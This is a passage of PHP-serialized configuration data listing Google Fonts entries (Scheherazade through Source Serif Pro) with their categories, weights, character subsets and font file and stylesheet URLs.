s:7:"subsets";a:2:{i:0;s:6:"arabic";i:1;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/scheherazade/v12/AuKlqGWzUC-8XqMOmsqXiy3USBnSvpkopQaUR-2r7iU.ttf";i:700;s:91:"http://fonts.gstatic.com/s/scheherazade/v12/C1wtT46acJkQxc6mPHwvHED2ttfZwueP-QU272T9-k4.ttf";}s:4:"urls";a:2:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Scheherazade:regular";i:700;s:56:"https://fonts.googleapis.com/css?family=Scheherazade:700";}}s:10:"schoolbell";a:7:{s:4:"name";s:10:"Schoolbell";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/schoolbell/v6/95-3djEuubb3cJx-6E7j4vesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Schoolbell:regular";}}s:9:"scope_one";a:7:{s:4:"name";s:9:"Scope One";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/scopeone/v2/ge7dY8Yht-n7_1cLHtoT3w.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Scope+One:regular";}}s:14:"seaweed_script";a:7:{s:4:"name";s:14:"Seaweed Script";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/seaweedscript/v4/eorWAPpOvvWrPw5IHwE60BnpV0hQCek3EmWnCPrvGRM.ttf";}s:4:"urls";a:1:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Seaweed+Script:regular";}}s:11:"secular_one";a:7:{s:4:"name";s:11:"Secular One";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:6:"hebrew";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/secularone/v1/yW9qikjpt_X0fh5oQJcdo6CWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Secular+One:regular";}}s:9:"sevillana";a:7:{s:4:"name";s:9:"Sevillana";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/sevillana/v4/6m1Nh35oP7YEt00U80Smiw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Sevillana:regular";}}s:11:"seymour_one";a:7:{s:4:"name";s:11:"Seymour One";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:8:"cyrillic";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/seymourone/v4/HrdG2AEG_870Xb7xBVv6C6CWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Seymour+One:regular";}}s:18:"shadows_into_light";a:7:{s:4:"name";s:18:"Shadows Into Light";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:94:"http://fonts.gstatic.com/s/shadowsintolight/v6/clhLqOv7MXn459PTh0gXYAW_5bEze-iLRNvGrRpJsfM.ttf";}s:4:"urls";a:1:{s:7:"regular";s:66:"https://fonts.googleapis.com/css?family=Shadows+Into+Light:regular";}}s:22:"shadows_into_light_two";a:7:{s:4:"name";s:22:"Shadows Into Light Two";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:97:"http://fonts.gstatic.com/s/shadowsintolighttwo/v4/gDxHeefcXIo-lOuZFCn2xVQrZk-Pga5KeEE_oZjkQjQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:70:"https://fonts.googleapis.com/css?family=Shadows+Into+Light+Two:regular";}}s:6:"shanti";a:7:{s:4:"name";s:6:"Shanti";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/shanti/v8/lc4nG_JG6Q-2FQSOMMhb_w.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Shanti:regular";}}s:5:"share";a:7:{s:4:"name";s:5:"Share";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:4:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/share/v6/1ytD7zSb_-g9I2GG67vmVw.ttf";s:6:"italic";s:62:"http://fonts.gstatic.com/s/share/v6/a9YGdQWFRlNJ0zClJVaY3Q.ttf";i:700;s:62:"http://fonts.gstatic.com/s/share/v6/XrU8e7a1YKurguyY2azk1Q.ttf";s:9:"700italic";s:83:"http://fonts.gstatic.com/s/share/v6/A992-bLVYwAflKu6iaznufesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:4:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Share:regular";s:6:"italic";s:52:"https://fonts.googleapis.com/css?family=Share:italic";i:700;s:49:"https://fonts.googleapis.com/css?family=Share:700";s:9:"700italic";s:55:"https://fonts.googleapis.com/css?family=Share:700italic";}}s:10:"share_tech";a:7:{s:4:"name";s:10:"Share Tech";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/sharetech/v5/Dq3DuZ5_0SW3oEfAWFpen_esZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Share+Tech:regular";}}s:15:"share_tech_mono";a:7:{s:4:"name";s:15:"Share Tech Mono";s:8:"category";s:9:"monospace";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/sharetechmono/v6/RQxK-3RA0Lnf3gnnnNrAscwD6PD0c3_abh9zHKQtbGU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:63:"https://fonts.googleapis.com/css?family=Share+Tech+Mono:regular";}}s:9:"shojumaru";a:7:{s:4:"name";s:9:"Shojumaru";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/shojumaru/v4/WP8cxonzQQVAoI3RJQ2wug.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Shojumaru:regular";}}s:11:"short_stack";a:7:{s:4:"name";s:11:"Short Stack";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/shortstack/v6/v4dXPI0Rm8XN9gk4SDdqlqCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Short+Stack:regular";}}s:9:"shrikhand";a:7:{s:4:"name";s:9:"Shrikhand";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:8:"gujarati";i:2;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/shrikhand/v1/45jwHiwIDTWCy3Ir85vvKA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Shrikhand:regular";}}s:8:"siemreap";a:7:{s:4:"name";s:8:"Siemreap";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"khmer";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/siemreap/v9/JSK-mOIsXwxo-zE9XDDl_g.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Siemreap:regular";}}s:10:"sigmar_one";a:7:{s:4:"name";s:10:"Sigmar One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/sigmarone/v6/oh_5NxD5JBZksdo2EntKefesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Sigmar+One:regular";}}s:7:"signika";a:7:{s:4:"name";s:7:"Signika";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"600";i:3;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:4:{i:300;s:85:"http://fonts.gstatic.com/s/signika/v6/0wDPonOzsYeEo-1KO78w4fesZW2xOQ-xsNqO47m55DA.ttf";s:7:"regular";s:64:"http://fonts.gstatic.com/s/signika/v6/WvDswbww0oAtvBg2l1L-9w.ttf";i:600;s:85:"http://fonts.gstatic.com/s/signika/v6/lQMOF6NUN2ooR7WvB7tADvesZW2xOQ-xsNqO47m55DA.ttf";i:700;s:85:"http://fonts.gstatic.com/s/signika/v6/lEcnfPBICWJPv5BbVNnFJPesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:4:{i:300;s:51:"https://fonts.googleapis.com/css?family=Signika:300";s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Signika:regular";i:600;s:51:"https://fonts.googleapis.com/css?family=Signika:600";i:700;s:51:"https://fonts.googleapis.com/css?family=Signika:700";}}s:16:"signika_negative";a:7:{s:4:"name";s:16:"Signika Negative";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"600";i:3;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:4:{i:300;s:93:"http://fonts.gstatic.com/s/signikanegative/v5/q5TOjIw4CenPw6C-TW06FjYFXpUPtCmIEFDvjUnLLaI.ttf";s:7:"regular";s:93:"http://fonts.gstatic.com/s/signikanegative/v5/Z-Q1hzbY8uAo3TpTyPFMXVM1lnCWMnren5_v6047e5A.ttf";i:600;s:93:"http://fonts.gstatic.com/s/signikanegative/v5/q5TOjIw4CenPw6C-TW06FrKLaDJM01OezSVA2R_O3qI.ttf";i:700;s:93:"http://fonts.gstatic.com/s/signikanegative/v5/q5TOjIw4CenPw6C-TW06FpYzPxtVvobH1w3hEppR8WI.ttf";}s:4:"urls";a:4:{i:300;s:60:"https://fonts.googleapis.com/css?family=Signika+Negative:300";s:7:"regular";s:64:"https://fonts.googleapis.com/css?family=Signika+Negative:regular";i:600;s:60:"https://fonts.googleapis.com/css?family=Signika+Negative:600";i:700;s:60:"https://fonts.googleapis.com/css?family=Signika+Negative:700";}}s:9:"simonetta";a:7:{s:4:"name";s:9:"Simonetta";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"900";i:3;s:9:"900italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:4:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/simonetta/v5/fN8puNuahBo4EYMQgp12Yg.ttf";s:6:"italic";s:87:"http://fonts.gstatic.com/s/simonetta/v5/ynxQ3FqfF_Nziwy3T9ZwL6CWcynf_cDxXwCLxiixG1c.ttf";i:900;s:87:"http://fonts.gstatic.com/s/simonetta/v5/22EwvvJ2r1VwVCxit5LcVi3USBnSvpkopQaUR-2r7iU.ttf";s:9:"900italic";s:87:"http://fonts.gstatic.com/s/simonetta/v5/WUXOpCgBZaRPrWtMCpeKoienaqEuufTBk9XMKnKmgDA.ttf";}s:4:"urls";a:4:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Simonetta:regular";s:6:"italic";s:56:"https://fonts.googleapis.com/css?family=Simonetta:italic";i:900;s:53:"https://fonts.googleapis.com/css?family=Simonetta:900";s:9:"900italic";s:59:"https://fonts.googleapis.com/css?family=Simonetta:900italic";}}s:7:"sintony";a:7:{s:4:"name";s:7:"Sintony";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/sintony/v4/IDhCijoIMev2L6Lg5QsduQ.ttf";i:700;s:85:"http://fonts.gstatic.com/s/sintony/v4/zVXQB1wqJn6PE4dWXoYpvPesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:2:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Sintony:regular";i:700;s:51:"https://fonts.googleapis.com/css?family=Sintony:700";}}s:13:"sirin_stencil";a:7:{s:4:"name";s:13:"Sirin Stencil";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/sirinstencil/v5/pRpLdo0SawzO7MoBpvowsImg74kgS1F7KeR8rWhYwkU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Sirin+Stencil:regular";}}s:8:"six_caps";a:7:{s:4:"name";s:8:"Six Caps";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/sixcaps/v7/_XeDnO0HOV8Er9u97If1tQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Six+Caps:regular";}}s:7:"skranji";a:7:{s:4:"name";s:7:"Skranji";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/skranji/v4/jnOLPS0iZmDL7dfWnW3nIw.ttf";i:700;s:85:"http://fonts.gstatic.com/s/skranji/v4/Lcrhg-fviVkxiEgoadsI1vesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:2:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Skranji:regular";i:700;s:51:"https://fonts.googleapis.com/css?family=Skranji:700";}}s:10:"slabo_13px";a:7:{s:4:"name";s:10:"Slabo 13px";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/slabo13px/v3/jPGWFTjRXfCSzy0qd1nqdvesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Slabo+13px:regular";}}s:10:"slabo_27px";a:7:{s:4:"name";s:10:"Slabo 27px";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/slabo27px/v3/gC0o8B9eU21EafNkXlRAfPesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Slabo+27px:regular";}}s:7:"slackey";a:7:{s:4:"name";s:7:"Slackey";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/slackey/v6/evRIMNhGVCRJvCPv4kteeA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Slackey:regular";}}s:6:"smokum";a:7:{s:4:"name";s:6:"Smokum";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/smokum/v6/8YP4BuAcy97X8WfdKfxVRw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Smokum:regular";}}s:6:"smythe";a:7:{s:4:"name";s:6:"Smythe";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/smythe/v7/yACD1gy_MpbB9Ft42fUvYw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Smythe:regular";}}s:7:"sniglet";a:7:{s:4:"name";s:7:"Sniglet";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"800";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/sniglet/v8/XWhyQLHH4SpCVsHRPRgu9w.ttf";i:800;s:85:"http://fonts.gstatic.com/s/sniglet/v8/NLF91nBmcEfkBgcEWbHFa_esZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:2:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Sniglet:regular";i:800;s:51:"https://fonts.googleapis.com/css?family=Sniglet:800";}}s:7:"snippet";a:7:{s:4:"name";s:7:"Snippet";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/snippet/v6/eUcYMLq2GtHZovLlQH_9kA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Snippet:regular";}}s:13:"snowburst_one";a:7:{s:4:"name";s:13:"Snowburst One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/snowburstone/v4/zSQzKOPukXRux2oTqfYJjIjjx0o0jr6fNXxPgYh_a8Q.ttf";}s:4:"urls";a:1:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Snowburst+One:regular";}}s:10:"sofadi_one";a:7:{s:4:"name";s:10:"Sofadi One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/sofadione/v4/nirf4G12IcJ6KI8Eoj119fesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Sofadi+One:regular";}}s:5:"sofia";a:7:{s:4:"name";s:5:"Sofia";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/sofia/v5/Imnvx0Ag9r6iDBFUY5_RaQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Sofia:regular";}}s:10:"sonsie_one";a:7:{s:4:"name";s:10:"Sonsie One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/sonsieone/v5/KSP7xT1OSy0q2ob6RQOTWPesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Sonsie+One:regular";}}s:16:"sorts_mill_goudy";a:7:{s:4:"name";s:16:"Sorts Mill Goudy";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:6:"italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:92:"http://fonts.gstatic.com/s/sortsmillgoudy/v6/JzRrPKdwEnE8F1TDmDLMUlIL2Qjg-Xlsg_fhGbe2P5U.ttf";s:6:"italic";s:92:"http://fonts.gstatic.com/s/sortsmillgoudy/v6/UUu1lKiy4hRmBWk599VL1TYNkCNSzLyoucKmbTguvr0.ttf";}s:4:"urls";a:2:{s:7:"regular";s:64:"https://fonts.googleapis.com/css?family=Sorts+Mill+Goudy:regular";s:6:"italic";s:63:"https://fonts.googleapis.com/css?family=Sorts+Mill+Goudy:italic";}}s:15:"source_code_pro";a:7:{s:4:"name";s:15:"Source Code Pro";s:8:"category";s:9:"monospace";s:9:"font_type";s:6:"google";s:12:"font_weights";a:7:{i:0;s:3:"200";i:1;s:3:"300";i:2;s:7:"regular";i:3;s:3:"500";i:4;s:3:"600";i:5;s:3:"700";i:6;s:3:"900";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:7:{i:200;s:91:"http://fonts.gstatic.com/s/sourcecodepro/v6/leqv3v-yTsJNC7nFznSMqaXvKVW_haheDNrHjziJZVk.ttf";i:300;s:91:"http://fonts.gstatic.com/s/sourcecodepro/v6/leqv3v-yTsJNC7nFznSMqVP7R5lD_au4SZC6Ks_vyWs.ttf";s:7:"regular";s:91:"http://fonts.gstatic.com/s/sourcecodepro/v6/mrl8jkM18OlOQN8JLgasD9Rl0pGnog23EMYRrBmUzJQ.ttf";i:500;s:91:"http://fonts.gstatic.com/s/sourcecodepro/v6/leqv3v-yTsJNC7nFznSMqX63uKwMO11Of4rJWV582wg.ttf";i:600;s:91:"http://fonts.gstatic.com/s/sourcecodepro/v6/leqv3v-yTsJNC7nFznSMqeiMeWyi5E_-XkTgB5psiDg.ttf";i:700;s:91:"http://fonts.gstatic.com/s/sourcecodepro/v6/leqv3v-yTsJNC7nFznSMqfgXsetDviZcdR5OzC1KPcw.ttf";i:900;s:91:"http://fonts.gstatic.com/s/sourcecodepro/v6/leqv3v-yTsJNC7nFznSMqRA_awHl7mXRjE_LQVochcU.ttf";}s:4:"urls";a:7:{i:200;s:59:"https://fonts.googleapis.com/css?family=Source+Code+Pro:200";i:300;s:59:"https://fonts.googleapis.com/css?family=Source+Code+Pro:300";s:7:"regular";s:63:"https://fonts.googleapis.com/css?family=Source+Code+Pro:regular";i:500;s:59:"https://fonts.googleapis.com/css?family=Source+Code+Pro:500";i:600;s:59:"https://fonts.googleapis.com/css?family=Source+Code+Pro:600";i:700;s:59:"https://fonts.googleapis.com/css?family=Source+Code+Pro:700";i:900;s:59:"https://fonts.googleapis.com/css?family=Source+Code+Pro:900";}}s:15:"source_sans_pro";a:7:{s:4:"name";s:15:"Source Sans Pro";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:12:{i:0;s:3:"200";i:1;s:9:"200italic";i:2;s:3:"300";i:3;s:9:"300italic";i:4;s:7:"regular";i:5;s:6:"italic";i:6;s:3:"600";i:7;s:9:"600italic";i:8;s:3:"700";i:9;s:9:"700italic";i:10;s:3:"900";i:11;s:9:"900italic";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:10:"vietnamese";i:2;s:9:"latin-ext";}s:5:"files";a:12:{i:200;s:91:"http://fonts.gstatic.com/s/sourcesanspro/v9/toadOcfmlt9b38dHJxOBGKXvKVW_haheDNrHjziJZVk.ttf";s:9:"200italic";s:91:"http://fonts.gstatic.com/s/sourcesanspro/v9/fpTVHK8qsXbIeTHTrnQH6OptKU7UIBg2hLM7eMTU8bI.ttf";i:300;s:91:"http://fonts.gstatic.com/s/sourcesanspro/v9/toadOcfmlt9b38dHJxOBGFP7R5lD_au4SZC6Ks_vyWs.ttf";s:9:"300italic";s:91:"http://fonts.gstatic.com/s/sourcesanspro/v9/fpTVHK8qsXbIeTHTrnQH6DUpNKoQAsDux-Todp8f29w.ttf";s:7:"regular";s:91:"http://fonts.gstatic.com/s/sourcesanspro/v9/ODelI1aHBYDBqgeIAH2zlNRl0pGnog23EMYRrBmUzJQ.ttf";s:6:"italic";s:91:"http://fonts.gstatic.com/s/sourcesanspro/v9/M2Jd71oPJhLKp0zdtTvoMwRX4TIfMQQEXLu74GftruE.ttf";i:600;s:91:"http://fonts.gstatic.com/s/sourcesanspro/v9/toadOcfmlt9b38dHJxOBGOiMeWyi5E_-XkTgB5psiDg.ttf";s:9:"600italic";s:91:"http://fonts.gstatic.com/s/sourcesanspro/v9/fpTVHK8qsXbIeTHTrnQH6Pp6lGoTTgjlW0sC4r900Co.ttf";i:700;s:91:"http://fonts.gstatic.com/s/sourcesanspro/v9/toadOcfmlt9b38dHJxOBGPgXsetDviZcdR5OzC1KPcw.ttf";s:9:"700italic";s:91:"http://fonts.gstatic.com/s/sourcesanspro/v9/fpTVHK8qsXbIeTHTrnQH6LVT4locI09aamSzFGQlDMY.ttf";i:900;s:91:"http://fonts.gstatic.com/s/sourcesanspro/v9/toadOcfmlt9b38dHJxOBGBA_awHl7mXRjE_LQVochcU.ttf";s:9:"900italic";s:91:"http://fonts.gstatic.com/s/sourcesanspro/v9/fpTVHK8qsXbIeTHTrnQH6A0NcF6HPGWR298uWIdxWv0.ttf";}s:4:"urls";a:12:{i:200;s:59:"https://fonts.googleapis.com/css?family=Source+Sans+Pro:200";s:9:"200italic";s:65:"https://fonts.googleapis.com/css?family=Source+Sans+Pro:200italic";i:300;s:59:"https://fonts.googleapis.com/css?family=Source+Sans+Pro:300";s:9:"300italic";s:65:"https://fonts.googleapis.com/css?family=Source+Sans+Pro:300italic";s:7:"regular";s:63:"https://fonts.googleapis.com/css?family=Source+Sans+Pro:regular";s:6:"italic";s:62:"https://fonts.googleapis.com/css?family=Source+Sans+Pro:italic";i:600;s:59:"https://fonts.googleapis.com/css?family=Source+Sans+Pro:600";s:9:"600italic";s:65:"https://fonts.googleapis.com/css?family=Source+Sans+Pro:600italic";i:700;s:59:"https://fonts.googleapis.com/css?family=Source+Sans+Pro:700";s:9:"700italic";s:65:"https://fonts.googleapis.com/css?family=Source+Sans+Pro:700italic";i:900;s:59:"https://fonts.googleapis.com/css?family=Source+Sans+Pro:900";s:9:"900italic";s:65:"https://fonts.googleapis.com/css?family=Source+Sans+Pro:900italic";}}s:16:"source_serif_pro";a:7:{s:4:"name";s:16:"Source Serif 